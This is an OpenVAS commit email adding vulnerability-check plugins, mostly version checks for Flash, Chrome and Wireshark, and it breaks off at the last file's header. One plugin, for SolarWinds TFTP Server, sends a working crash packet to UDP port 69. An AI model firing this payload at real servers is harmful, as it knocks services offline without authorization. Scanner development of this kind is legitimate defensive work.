[Openvas-commits] r8127 - in trunk/openvas-plugins: . scripts

[scm-commit@wald.intevation.org]

Author: chandra
Date: 2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)
New Revision: 8127

Added:
   trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_lin.nasl
   trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_win.nasl
   trunk/openvas-plugins/scripts/secpod_google_chrome_mult_vuln_win_jun10.nasl
   trunk/openvas-plugins/scripts/secpod_solarwinds_tftp_server_dos_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_wireshark_smb_dissector_dos_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_lin.nasl
   trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_win.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/ChangeLog	2010-06-22 11:34:32 UTC (rev 8127)
@@ -1,5 +1,20 @@
 2010-06-22  Chandrashekhar B <bchandra at secpod.com>
 
+	* scripts/secpod_google_chrome_mult_vuln_win_jun10.nasl,
+	scripts/secpod_adobe_prdts_mult_vuln_jun10_win.nasl,
+	scripts/secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl,
+	scripts/secpod_solarwinds_tftp_server_dos_vuln.nasl,
+	scripts/secpod_xnview_mbm_bof_vuln_lin.nasl,
+	scripts/secpod_xnview_mbm_bof_vuln_win.nasl,
+	scripts/secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl,
+	scripts/secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl,
+	scripts/secpod_wireshark_smb_dissector_dos_vuln_win.nasl,
+	scripts/secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl,
+	scripts/secpod_adobe_prdts_mult_vuln_jun10_lin.nasl:
+	Added new plugins.
+
+2010-06-22  Chandrashekhar B <bchandra at secpod.com>
+
 	* scripts/winsyslog_dos.nasl,
 	scripts/rpc_kcms.nasl,
 	scripts/hacker_defender.nasl,

Added: trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_lin.nasl	2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_lin.nasl	2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,105 @@
+ ##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_adobe_prdts_mult_vuln_jun10_lin.nasl 9685 2010-06-16 142:24:34Z jun $
+#
+# Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Linux)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902194);
+  script_version("Revision$:1.0");
+  script_cve_id("CVE-2008-4546", "CVE-2009-3793", "CVE-2010-1297", "CVE-2010-2160",
+                "CVE-2010-2161", "CVE-2010-2162", "CVE-2010-2163", "CVE-2010-2164",
+                "CVE-2010-2165", "CVE-2010-2166", "CVE-2010-2167", "CVE-2010-2169",
+                "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2172", "CVE-2010-2173",
+                "CVE-2010-2174", "CVE-2010-2175", "CVE-2010-2176", "CVE-2010-2177",
+                "CVE-2010-2178", "CVE-2010-2179", "CVE-2010-2180", "CVE-2010-2181",
+                "CVE-2010-2182", "CVE-2010-2183", "CVE-2010-2184", "CVE-2010-2185",
+                "CVE-2010-2186", "CVE-2010-2187", "CVE-2010-2188", "CVE-2010-2189");
+  script_bugtraq_id(40759);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Linux)");
+  desc = "
+  Overview: This host is installed with Adobe Flash Player/Air and is prone to
+  multiple vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to input validation errors, memory corruptions,
+  array indexing, use-after-free, integer and buffer overflows, and
+  invalid pointers when processing malformed Flash content.
+
+  Impact:
+  Successful exploitation will let the remote attackers to obtain sensitive
+  information or cause a denial of service.
+
+  Impact Level: Application/System.
+
+  Affected Software/OS:
+  Adobe AIR version prior to 2.0.2.12610,
+  Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64 on Linux.
+
+  Fix: Update to Adobe  Air2.0.2.12610 or Adobe Flash Player 9.0.277.0 or 10.0.45.2,
+  http://get.adobe.com/air
+  http://www.adobe.com/support/flashplayer/downloads.html
+
+  References:
+  http://www.vupen.com/english/advisories/2010/1421
+  http://securitytracker.com/alerts/2010/Jun/1024086.html
+  http://www.adobe.com/support/security/bulletins/apsb10-14.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Adobe Flash Player/Air");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 SecPOd");
+  script_family("General");
+  script_dependencies("gb_adobe_flash_player_detect_lin.nasl");
+  script_require_keys("AdobeFlashPlayer/Linux/Ver", "Adobe/Air/Linux/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Check for Adobe Flash Player
+playerVer = get_kb_item("AdobeFlashPlayer/Linux/Ver");
+if(playerVer != NULL)
+{
+  # Grep for version 10.x < 10.0.45.2, less than 9.0.277.0
+  if(version_is_less(version:playerVer, test_version2:"9.0.277.0") ||
+     version_in_range(version:playerVer, test_version:"10.0", test_version2:"10.0.45.1"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}
+
+# Check for Adobe Air
+airVer = get_kb_item("Adobe/Air/Linux/Ver");
+if(airVer != NULL)
+{
+  # Grep for version < 2.0.2.12610
+  if(version_is_less(version:airVer, test_version:"2.0.2.12610")){
+    security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_lin.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision

Added: trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_win.nasl	2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_win.nasl	2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,105 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_adobe_prdts_mult_vuln_jun10_win.nasl 9685 2010-06-16 12:24:34Z jun $
+#
+# Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Win)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902193);
+  script_version("Revision$:1.0");
+  script_cve_id("CVE-2008-4546", "CVE-2009-3793", "CVE-2010-1297", "CVE-2010-2160",
+                "CVE-2010-2161", "CVE-2010-2162", "CVE-2010-2163", "CVE-2010-2164",
+                "CVE-2010-2165", "CVE-2010-2166", "CVE-2010-2167", "CVE-2010-2169",
+                "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2173", "CVE-2010-2174",
+                "CVE-2010-2175", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2178",
+                "CVE-2010-2179", "CVE-2010-2180", "CVE-2010-2181", "CVE-2010-2182",
+                "CVE-2010-2183", "CVE-2010-2184", "CVE-2010-2185", "CVE-2010-2186",
+                "CVE-2010-2187", "CVE-2010-2188", "CVE-2010-2189");
+  script_bugtraq_id(40759);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Win)");
+  desc = "
+  Overview: This host is installed with Adobe Flash Player/Air and is prone to
+  multiple vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to input validation errors, memory corruptions,
+  array indexing, use-after-free, integer and buffer overflows, and
+  invalid pointers when processing malformed Flash content.
+
+  Impact:
+  Successful exploitation will let the attackers to obtain sensitive
+  information or cause a denial of service.
+
+  Impact Level: Application/System.
+
+  Affected Software/OS:
+  Adobe AIR version prior to 2.0.2.12610,
+  Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64 on windows.
+
+  Fix: Update to Adobe  Air2.0.2.12610 or Adobe Flash Player 9.0.277.0 or 10.0.45.2,
+  http://get.adobe.com/air
+  http://www.adobe.com/support/flashplayer/downloads.html
+
+  References:
+  http://www.vupen.com/english/advisories/2010/1421
+  http://securitytracker.com/alerts/2010/Jun/1024086.html
+  http://www.adobe.com/support/security/bulletins/apsb10-14.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Adobe Flash Player/Air");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 SecPOd");
+  script_family("General");
+  script_dependencies("gb_adobe_flash_player_detect_win.nasl");
+  script_require_keys("AdobeFlashPlayer/Win/Ver", "Adobe/Air/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Check for Adobe Flash Player
+playerVer = get_kb_item("AdobeFlashPlayer/Win/Ver");
+if(playerVer != NULL)
+{
+  # Grep for version 10.x < 10.0.45.2, less than 9.0.277.0
+  if(version_is_less(version:playerVer, test_version2:"9.0.277.0") ||
+     version_in_range(version:playerVer, test_version:"10.0", test_version2:"10.0.45.1"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}
+
+# Check for Adobe Air
+airVer = get_kb_item("Adobe/Air/Win/Ver");
+if(airVer != NULL)
+{
+  # Grep for version < 2.0.2.12610
+  if(version_is_less(version:airVer, test_version:"2.0.2.12610")){
+    security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision

Added: trunk/openvas-plugins/scripts/secpod_google_chrome_mult_vuln_win_jun10.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_mult_vuln_win_jun10.nasl	2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_mult_vuln_win_jun10.nasl	2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,102 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_mult_vuln_win_jun10.nasl 9593 2010-06-17 13:55:29Z jun $
+#
+# Google Chrome 'WebKit' Multiple Vulnerabilities (Windows) - June 10
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902073);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-2304", "CVE-2010-2303", "CVE-2010-2302" ,"CVE-2010-2301",
+                "CVE-2010-2300", "CVE-2010-2299", "CVE-2010-2297", "CVE-2010-2296",
+                "CVE-2010-2295");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Google Chrome 'WebKit' Multiple Vulnerabilities (Windows) - June 10");
+  desc = "
+  Overview: This host is installed with Google Chrome and is prone to multiple
+  vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to:
+  - Error in 'toAlphabetic' function in 'rendering/RenderListMarker.cpp' in
+    WebCore in WebKit.
+  - Error in 'page/Geolocation.cpp' which does stop timers associated with
+    geolocation upon deletion of a document.
+  - Memory corruption in 'font' handling.
+  - Error in 'editing/markup.cpp' which fails to validate input passed to
+    'innerHTML' property of textarea.
+  - Error in 'third_party/WebKit/WebCore/dom/Element.cpp' in 'Element::normalizeAttributes()'
+    resulting in DOM mutation events being fired.
+  - 'Clipboard::DispatchObject' function which does not properly handle
+    'CBF_SMBITMAP objects' in a 'ViewHostMsg_ClipboardWriteObjectsAsync' message
+     which lead to illegal memory accesses and arbitrary execution related to
+    'Type Confusion' issue.
+  - Error in 'rendering/FixedTableLayout.cpp' which leads to denial of service
+  - 'Cross-origin bypass' in DOM methods'
+  - Error in 'page/EventHandler.cpp' causes Cross-origin keystroke redirection.
+
+  Impact:
+  Successful exploitation will allow remote attackers to cause a denial of
+  service, cross-site-scripting and execution of arbitrary code.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Google Chrome version prior to 5.0.375.70 on Windows
+
+  Fix: Upgrade to Google Chrome version 5.0.375.70 or later,
+  For updates refer, http://www.google.com/chrome
+
+  References:
+  http://secunia.com/advisories/40072
+  http://code.google.com/p/chromium/issues/detail?id=43902
+  http://code.google.com/p/chromium/issues/detail?id=43304
+  http://code.google.com/p/chromium/issues/detail?id=43315
+  http://code.google.com/p/chromium/issues/detail?id=43307
+  http://googlechromereleases.blogspot.com/2010/06/stable-channel-update.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Google Chrome");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 SecPod");
+  script_family("General");
+  script_dependencies("gb_google_chrome_detect_win.nasl");
+  script_require_keys("GoogleChrome/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("GoogleChrome/Win/Ver");
+if(!chromeVer){
+  exit(0);
+}
+
+## Check for Google Chrome version < 5.0.375.70
+if(version_is_less(version:chromeVer, test_version:"5.0.375.70")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_mult_vuln_win_jun10.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision

Added: trunk/openvas-plugins/scripts/secpod_solarwinds_tftp_server_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_solarwinds_tftp_server_dos_vuln.nasl	2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_solarwinds_tftp_server_dos_vuln.nasl	2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,110 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_solarwinds_tftp_server_dos_vuln.nasl 9706 2010-06-17 13:13:13Z jun $
+#
+# SolarWinds TFTP Server Write Request Denial Of Service Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(901124);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-2310");
+  script_bugtraq_id(40824);
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("SolarWinds TFTP Server Write Request Denial Of Service Vulnerability");
+  desc = "
+  Overview: This host is running SolarWinds TFTP Server and is prone to
+  denial of service vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by an error when processing TFTP write requests,
+  which can be exploited to crash the server via a specially crafted
+  request sent to UDP port 69.
+
+  Impact:
+  Successful exploitation will let the attacker to crash the server process,
+  resulting in a denial-of-service condition.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  SolarWinds TFTP Server 10.4.0.13
+
+  Fix: No solution or patch is available as on 17th June, 2010. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.solarwinds.com/downloads/
+
+  References:
+  http://www.exploit-db.com/exploits/13836
+  ";
+
+  script_description(desc);
+  script_summary("Determine if SolarWinds TFTP Server is prone to a denial-of-service vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2010 SecPod");
+  script_family("Denial of Service");
+  script_dependencies("tftpd_detect.nasl");
+  script_require_ports("Services/udp/tftp");
+  exit(0);
+}
+
+
+include("tftp.inc");
+
+## Not a Safe Check, exit
+if(safe_checks()){
+  exit(0);
+}
+
+## Get TFTP Port
+port = get_kb_item("Services/udp/tftp");
+if(!port){
+  port = 69;
+}
+
+## Check TFTP Port Status
+if(tftp_alive(port:port))
+{
+  ## Open UDP Socket
+  sock = open_sock_udp(port);
+  if(!sock){
+    exit(0);
+  }
+
+  ## Building Crash
+  crash = raw_string(0x00,0x02) + crap(1000) + raw_string(0x00) +
+          "NETASCII" + raw_string(0x00);
+  ## Sending Crash
+  send(socket:sock, data:crash);
+  ## Close UDP Socket
+  close(sock);
+
+  ## Check TFTP Port Status
+  if(!tftp_alive(port:port))
+  {
+    security_warning(port:port,proto:"udp");
+    exit(0);
+  }
+}
+


Property changes on: trunk/openvas-plugins/scripts/secpod_solarwinds_tftp_server_dos_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision

Added: trunk/openvas-plugins/scripts/secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl	2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl	2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,82 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl 9679 2010-06-17 13:09:24Z jun $
+#
+# Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902195);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-2284");
+  script_tag(name:"cvss_base", value:"8.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows)");
+  desc = "
+  Overview: This host is installed with Wireshark and is prone to buffer overflow
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by a buffer overflow error within the 'ASN.1 BER' dissector.
+
+  Impact:
+  It has unknown impact and remote attack vectors.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Wireshark version 0.10.13 to 1.0.13 and 1.2.0 to 1.2.8 on windows.
+
+  Fix:  Upgrade to Wireshark version 1.0.14 or 1.2.9:
+  For updates refer, http://www.wireshark.org/download.html
+
+  References:
+  http://secunia.com/advisories/40112
+  http://www.vupen.com/english/advisories/2010/1418
+  http://www.wireshark.org/security/wnpa-sec-2010-05.html
+  http://www.wireshark.org/security/wnpa-sec-2010-06.html
+  http://www.openwall.com/lists/oss-security/2010/06/11/1 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Wireshark");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 SecPod");
+  script_family("Buffer overflow");
+  script_dependencies("gb_wireshark_detect_win.nasl");
+  script_require_keys("Wireshark/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+sharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!sharkVer){
+  exit(0);
+}
+
+# Grep for Wireshark version
+if(version_in_range(version:sharkVer, test_version:"1.2.0", test_version2:"1.2.8") ||
+   version_in_range(version:sharkVer, test_version:"0.10.13", test_version2:"1.0.13")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
   + *
Name: svn:keywords
   + Revision

Added: trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl	2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl	2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl 9679 2010-06-17 16:09:24Z jun $
+#
+# Wireshark SigComp Universal Decompressor Virtual Machine dissector BOF Vulnerability (Win)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902199);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-2287");
+  script_tag(name:"cvss_base", value:"8.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Wireshark SigComp Universal Decompressor Virtual Machine dissector BOF Vulnerability (Win)");
+  desc = "
+  Overview: This host is installed with Wireshark and is prone to buffer overflow
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to a buffer overflow error in the SigComp Universal
+  Decompressor Virtual Machine dissector.
+
+  Impact:
+  It has unknown impact and remote attack vectors.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Wireshark version 0.10.8 to 1.0.13 and 1.2.0 to 1.2.8
+
+  Fix: Upgrade to Wireshark version 1.0.14 or 1.2.9:
+  For updates refer, http://www.wireshark.org/download.html
+
+  References:
+  http://secunia.com/advisories/40112
+  http://www.vupen.com/english/advisories/2010/1418
+  http://www.wireshark.org/security/wnpa-sec-2010-05.html
+  http://www.wireshark.org/security/wnpa-sec-2010-06.html
+  http://www.openwall.com/lists/oss-security/2010/06/11/1 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Wireshark");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 SecPod");
+  script_family("Buffer overflow");
+  script_dependencies("gb_wireshark_detect_win.nasl");
+  script_require_keys("Wireshark/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+sharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!sharkVer){
+  exit(0);
+}
+
+# Check for Wireshark version
+if(version_in_range(version:sharkVer, test_version:"1.2.0", test_version2:"1.2.8") ||
+   version_in_range(version:sharkVer, test_version:"0.10.8", test_version2:"1.0.13")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
   + *
Name: svn:keywords
   + Revision

Added: trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl	2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl	2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl 9679 2010-06-17 15:09:24Z jun $
+#
+# Wireshark SigComp Universal Decompressor Virtual Machine dissector DOS Vulnerability (Win)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902198);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-2286");
+  script_tag(name:"cvss_base", value:"3.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Wireshark SigComp Universal Decompressor Virtual Machine dissector DOS Vulnerability (Win)");
+  desc = "
+  Overview: This host is installed with Wireshark and is prone to Denial of
+  Service vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by an off-by-one error within the SigComp Universal
+  Decompressor Virtual Machine, which could be exploited by attackers to
+  crash an affected application or execute arbitrary code via unknown vectors.
+
+  Impact:
+  Successful exploitation will allow the attackers to crash an affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Wireshark version 0.10.7 through 1.0.13 and 1.2.0 through 1.2.8
+
+  Fix:  Upgrade to Wireshark version 1.0.14 or 1.2.9:
+  For updates refer, http://www.wireshark.org/download.html
+
+  References:
+  http://secunia.com/advisories/40112
+  http://www.vupen.com/english/advisories/2010/1418
+  http://www.wireshark.org/security/wnpa-sec-2010-05.html
+  http://www.wireshark.org/security/wnpa-sec-2010-06.html
+  http://www.openwall.com/lists/oss-security/2010/06/11/1 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Wireshark");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 SecPod");
+  script_family("Denial of Service");
+  script_dependencies("gb_wireshark_detect_win.nasl");
+  script_require_keys("Wireshark/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+sharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!sharkVer){
+  exit(0);
+}
+
+# Check for Wireshark version
+if(version_in_range(version:sharkVer, test_version:"1.2.0", test_version2:"1.2.8") ||
+   version_in_range(version:sharkVer, test_version:"0.10.7", test_version2:"1.0.13")){
+  security_warning(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
   + *
Name: svn:keywords
   + Revision

Added: trunk/openvas-plugins/scripts/secpod_wireshark_smb_dissector_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wireshark_smb_dissector_dos_vuln_win.nasl	2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_wireshark_smb_dissector_dos_vuln_win.nasl	2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
